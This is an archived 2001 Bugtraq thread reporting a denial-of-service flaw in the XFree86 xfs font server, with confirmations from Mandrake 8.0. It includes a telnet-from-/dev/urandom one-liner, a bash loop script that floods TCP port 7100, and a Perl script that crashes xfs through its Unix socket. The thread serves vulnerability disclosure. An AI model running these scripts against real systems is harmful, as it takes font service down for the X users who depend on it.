6599001 2001-06-06 16:31 +0200 /26 rader/ =?iso-8859-2?q?Jaros=B3aw=20Zachwieja?= <grok@mhd.pl>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-08 18:27 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17321>
Ärende: XFree86-xfs-4.0.1-1 DoS
------------------------------------------------------------
From: =?iso-8859-2?q?Jaros=B3aw=20Zachwieja?= <grok@mhd.pl>
To: bugtraq@securityfocus.com
Message-ID: <01060616314900.14503@base.mhd.pl>
Hello,
xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm), RedHat 7.0 seems
to suffer from a Denial of Service attack. To cause xfs to stop
responding for requests, try to do the fillowing:
$ telnet victim xfs </dev/urandom
Repeat about 100 (or 1000) times and you get Connection refused
message.
Regular Xservers can no longer connect, usually crash stating Could
not open default font 'fixed' and probably get disabled for 5
minutes if run from inittab.
I'd appreciate any succesfull/unsuccesfull attemps of reproducing this
behaviour.
Regards,
--
Valentine M. Smith
(6599001) /=?iso-8859-2?q?Jaros=B3aw=20Zachwieja?= <grok@mhd.pl>/(Ombruten)
6604891 2001-06-10 03:16 -0400 /79 rader/ Mathias Dybvik <tmdybvik@hotmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-11 02:21 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: grok@mhd.pl
Mottagare: Bugtraq (import) <17360>
Ärende: Re:XFree86-xfs-4.0.1-1 DoS
------------------------------------------------------------
From: "Mathias Dybvik" <tmdybvik@hotmail.com>
To: bugtraq@securityfocus.com
Cc: grok@mhd.pl
Message-ID: <F222dnHM3SOlbpH71yE00000542@hotmail.com>
Confirmed, on Mandrake 8.0.
I should, however, point out that I was only able to take down the
font-server as a local user, and not from a remote host. This could
be a bandwidth problem, caused by the fact that I only have a measly
10Mb/s LAN. Then again, my urandom bandwidth is less than half of
that, so I'm not sure what gives...
The moral of the story is that (at least) any local user can kill the
xfs process. This has dire consequences for any user either using X
on that box, or using an x-terminal relying on that fontserver.
[user@userland ~]$ ps -ax|grep xfs
9363 ? S 0:00 xfs -port 7100 -daemon -user xfs
9574 pts/1 S 0:00 grep xfs
[user@userland ~]$./xfkill
[user@userland ~]$ ps -ax|grep xfs
9626 pts/1 S 0:00 grep xfs
$cat xfkill
[user@userland ~]$ cat xfkill
#!/bin/bash
XFSPORT=7100
XFS_IP=192.168.1.254
for ((COUNT=0;COUNT<500;COUNT=$COUNT+1)) do
echo sending garbage to $XFSPORT pass $COUNT
telnet $XFS_IP $XFSPORT </dev/urandom &>/dev/null
done
Version information:
$ rpm -qi XFree86-xfs
Name : XFree86-xfs Relocations: (not relocateable)
Version : 4.0.3 Vendor: MandrakeSoft
Release : 7mdk Build Date: Sun 08 Apr 2001 08
Install date: Mon 23 Apr 2001 09:32:49 PM UTC Build Host: bi.mandrake
Group : System/Servers Source RPM: XFree86-4.0.3-7mdk
Size : 536213 License: MIT
Summary : Font server for XFree86
>>>>>>>>>>>>>>>>>>Original Message <<<<<<<<<<<<<<<<<<
On 6/6/01, 2:31:49 PM, =?iso-8859-2?q?Jaros=B3aw=20Zachwieja?=
<grok@mhd.pl> wrote regarding XFree86-xfs-4.0.1-1 DoS:
>Hello,
>xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm), RedHat 7.0 seems to
>suffer from a Denial of Service attack.
>To cause xfs to stop responding for requests, try to do the fillowing:
>$ telnet victim xfs </dev/urandom
>Repeat about 100 (or 1000) times and you get Connection refused message.
>Regular Xservers can no longer connect, usually crash stating Could not
>open
>default font 'fixed' and probably get disabled for 5 minutes if run from
>inittab.
>I'd appreciate any succesfull/unsuccesfull attemps of reproducing this
>behaviour.
>Regards,
>--
>Valentine M. Smith
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
(6604891) /Mathias Dybvik <tmdybvik@hotmail.com>/(Ombruten)
6608512 2001-06-11 00:53 -0400 /59 rader/ Mathias Dybvik <tmdybvik@hotmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-11 19:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: grok@mhd.pl
Mottagare: Bugtraq (import) <17367>
Ärende: Re:XFree86-xfs-4.0.1-1 DoS
------------------------------------------------------------
From: "Mathias Dybvik" <tmdybvik@hotmail.com>
To: bugtraq@securityfocus.com
Cc: grok@mhd.pl
Message-ID: <F98EybqfAj81EYtN3Is000056d0@hotmail.com>
I forgot to mention that the TCP attack against the font server is
(obviously) only applicable to font-servers listening to TCP. (Which
is probably only the case for systems serving x-terminals.) Thanks
to people who pointed this out.
If we want to kill a font-server running on the
Mandrake/Redhat/whatever *default* setup, we have to send the
garbage to the Unix-Domain socket instead.
I've only tested this on Mandrake 8.0, on my system it takes about
5-10 seconds before xfs dies. I appologize if the script is ugly,
I'm a PHB, not a developer, and the few lines below is more perl
than I've written all year.
Mathias
[user@userland ~]$ ps -ax|grep xfs
3690 ? S 0:00 xfs -port -1 -daemon -user xfs
3723 pts/2 S 0:00 grep xfs
[user@userland ~]$./xfdeath
[user@userland ~]$ ps -ax|grep xfs
3780 pts/1 S 0:00 grep xfs
[user@userland ~]$cat xfdeath
#!/usr/bin/perl -w
use Socket;
use strict;
my ($grab, $line, $garbagebyte,$i,$STOP);
sub darned {
$STOP=1;
}
open(GARBAGE, "/dev/urandom") || die "cannot read /dev/urandom: $!";
$SIG{'PIPE'} = 'darned';
for ($i = 0; $i < 1000; ++$i)
{
$STOP=0;
$grab = shift || '/tmp/.font-unix/fs-1';
socket(A_SOCKET, PF_UNIX, SOCK_STREAM, 0) || die "socket: $!";
connect(A_SOCKET, sockaddr_un($grab)) || die "connect: $!";
while (!$STOP) {
read(GARBAGE, $garbagebyte, 1);
print ".";
print A_SOCKET $garbagebyte;
}
}
exit;
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
(6608512) /Mathias Dybvik <tmdybvik@hotmail.com>/(Ombruten)